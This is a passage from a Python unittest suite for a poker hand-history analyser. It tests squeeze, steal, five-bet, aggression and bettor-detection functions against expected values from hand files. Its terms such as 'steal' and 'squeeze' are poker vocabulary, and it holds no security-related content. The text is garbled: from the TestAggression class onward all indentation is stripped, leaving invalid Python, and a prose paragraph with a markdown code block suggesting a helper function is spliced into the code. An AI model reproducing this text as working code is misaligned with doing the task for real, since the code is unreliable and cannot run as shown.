            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_opp(), msg=file + ' ' + player)
        file = '__P__LIFRFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
        file = '__P__LICFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_opp(), msg=file + ' ' + player)
        file = '__P__LICRFFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_opp(), msg=file + ' ' + player)

    def test_sqz(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__FOFRFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
        file = '__P__FOCRFFRFC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz(), msg=file + ' ' + player)
        file = '__P__FOCCFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
        file = '__P__LIFRFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
        file = '__P__LICFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
        file = '__P__LICRFFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz(), msg=file + ' ' + player)
    def test_sqz_def_opp(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__FOFRFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
        file = '__P__FOCRFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
        file = '__P__FOCRFFFRRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
        file = '__P__LICRFFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
        file = '__P__LICRFFFFRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
        file = '__P__LICRFFCFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.sqz_def_opp(), msg=file + ' ' + player)

    def test_enum_sqz_def(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__FOFRFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
        file = '__P__FOCRFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual('fold', tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual('fold', tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
        file = '__P__FOCRFFFRRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual('fold', tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual('4bet', tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
        file = '__P__LICRFFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual('fold', tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual('fold', tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
        file = '__P__LICRFFFFRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual('fold', tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual('4bet', tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
        file = '__P__LICRFFCFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_sqz_def(), msg=file + ' ' + player)
    def test_steal_opp(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__FFFFOF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.steal_opp(), msg=file + ' ' + player)
            player = 'g5'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.steal_opp(), msg=file + ' ' + player)
            player = 'g6'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal_opp(), msg=file + ' ' + player)
        file = '__P__FFLFIFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal_opp(), msg=file + ' ' + player)
            player = 'g5'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal_opp(), msg=file + ' ' + player)
            player = 'g6'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal_opp(), msg=file + ' ' + player)

    def test_steal(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__FFFFOF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
            player = 'g5'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.steal(), msg=file + ' ' + player)
            player = 'g6'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
        file = '__P__FFLFIFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
            player = 'g5'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
            player = 'g6'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal(), msg=file + ' ' + player)
    def test_steal_def_opp(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__FFFOFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal_def_opp(), msg=file + ' ' + player)
            player = 'g5'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.steal_def_opp(), msg=file + ' ' + player)
            player = 'g6'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.steal_def_opp(), msg=file + ' ' + player)
        file = '__P__FFFOFRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal_def_opp(), msg=file + ' ' + player)
            player = 'g5'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.steal_def_opp(), msg=file + ' ' + player)
            player = 'g6'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.steal_def_opp(), msg=file + ' ' + player)
        file = '__P__FOFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal_def_opp(), msg=file + ' ' + player)
            player = 'g5'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal_def_opp(), msg=file + ' ' + player)
            player = 'g6'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.steal_def_opp(), msg=file + ' ' + player)

    def test_enum_steal_def(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__FFFOFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_steal_def(), msg=file + ' ' + player)
            player = 'g5'
            tmp = Preflop(hand, player)
            self.assertEqual('fold', tmp.enum_steal_def(), msg=file + ' ' + player)
            player = 'g6'
            tmp = Preflop(hand, player)
            self.assertEqual('fold', tmp.enum_steal_def(), msg=file + ' ' + player)
        file = '__P__FFFOFRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_steal_def(), msg=file + ' ' + player)
            player = 'g5'
            tmp = Preflop(hand, player)
            self.assertEqual('fold', tmp.enum_steal_def(), msg=file + ' ' + player)
            player = 'g6'
            tmp = Preflop(hand, player)
            self.assertEqual('3bet', tmp.enum_steal_def(), msg=file + ' ' + player)
        file = '__P__FOFFFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_steal_def(), msg=file + ' ' + player)
            player = 'g5'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_steal_def(), msg=file + ' ' + player)
            player = 'g6'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_steal_def(), msg=file + ' ' + player)
    def test_five_bet_def_opp(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__FOFRFFRRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.five_bet_def_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
        file = '__P__FOCRFFRRFC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.five_bet_def_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
        file = '__P__FOCRFFRCRFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual(True, tmp.five_bet_def_opp(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(False, tmp.five_bet_def_opp(), msg=file + ' ' + player)

    def test_enum_five_bet_def(self):
        # folder with the correct answers
        folder = f + '/testy/rece/'
        file = '__P__FOFRFFRRF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_five_bet_def(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual('fold', tmp.enum_five_bet_def(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_five_bet_def(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_five_bet_def(), msg=file + ' ' + player)
        file = '__P__FOCRFFRRFC.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_five_bet_def(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual('call 5bet', tmp.enum_five_bet_def(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_five_bet_def(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_five_bet_def(), msg=file + ' ' + player)
        file = '__P__FOCRFFRCRFF.txt'
        with open(folder + file) as data:
            hand = Reka(data.readlines())
            player = 'g1'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_five_bet_def(), msg=file + ' ' + player)
            player = 'g2'
            tmp = Preflop(hand, player)
            self.assertEqual('6bet', tmp.enum_five_bet_def(), msg=file + ' ' + player)
            player = 'g3'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_five_bet_def(), msg=file + ' ' + player)
            player = 'g4'
            tmp = Preflop(hand, player)
            self.assertEqual(None, tmp.enum_five_bet_def(), msg=file + ' ' + player)
class TestAggression(unittest.TestCase):
def test_call(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'bug_ai.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'fidas1972'
tmp = Aggression(hand, street, player)
self.assertEqual(-1, tmp.call(),
msg=file + ' ' + street + ' ' + player)
file = 'in1gr2r__F__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = Aggression(hand, street, player)
self.assertEqual(0, tmp.call(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'zw'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.call(),
msg=file + ' ' + street + ' ' + player)
file = 'in1gr3r__F__BRCRCRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = Aggression(hand, street, player)
self.assertEqual(0, tmp.call(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'zw'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.call(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.call(),
msg=file + ' ' + street + ' ' + player)
file = 'in1gr3r__F__XXBRCRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = Aggression(hand, street, player)
self.assertEqual(0, tmp.call(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'zw'
tmp = Aggression(hand, street, player)
self.assertEqual(2, tmp.call(),
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr'
tmp = Aggression(hand, street, player)
self.assertEqual(0, tmp.call(),
msg=file + ' ' + street + ' ' + player)
def test_aggr(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'bug_ai.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'fidas1972'
tmp = Aggression(hand, street, player)
self.assertEqual(-1, tmp.aggr(),
msg=file + ' ' + street + ' ' + player)
file = 'in1gr2r__F__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'zw'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
file = 'in1gr3r__F__BRCRCRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = Aggression(hand, street, player)
self.assertEqual(2, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'zw'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
file = 'in1gr3r__F__XXBRCRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'sf'
tmp = Aggression(hand, street, player)
self.assertEqual(1, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'zw'
tmp = Aggression(hand, street, player)
self.assertEqual(0, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr'
tmp = Aggression(hand, street, player)
self.assertEqual(2, tmp.aggr(), msg=file + ' ' + street + ' ' + player)
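The failure messages in these tests are built by repeating the same string concatenation, `file + ' ' + street + ' ' + player`, on every assertion. As a minimal sketch (the `case_msg` helper below is hypothetical, not part of the original suite), that pattern could be centralized in one place:

```python
def case_msg(file, street, player):
    """Build the failure message used throughout these tests.

    Hypothetical helper: replaces the repeated
    `file + ' ' + street + ' ' + player` concatenation.
    """
    return ' '.join((file, street, player))
```

Each `msg=file + ' ' + street + ' ' + player` argument above could then become `msg=case_msg(file, street, player)`, keeping the message format consistent if it ever changes.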
class TestBet(unittest.TestCase):
def test_better(self):
# folder containing the expected answers
folder = 'E:/sfera/poker/czytanie_akcji/testy/bet/'
file = 'river.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual(None, tmp.better,
msg=file + ' ' + street + ' ' + player)
file = 'a1-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.better,
msg=file + ' ' + street + ' ' + player)
file = 'a2-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Sfera2', tmp.better,
msg=file + ' ' + street + ' ' + player)
file = 'a3-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
file = 'a4-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
file = 'a5-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
file = 'a6-1.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
street, player = 'flop', 'Sfera2'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'Zwidawurzn'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
msg=file + ' ' + street + ' ' + player)
street, player = 'flop', 'kr123445'
tmp = Bet(hand, street, player)
self.assertEqual('Zwidawurzn', tmp.better,
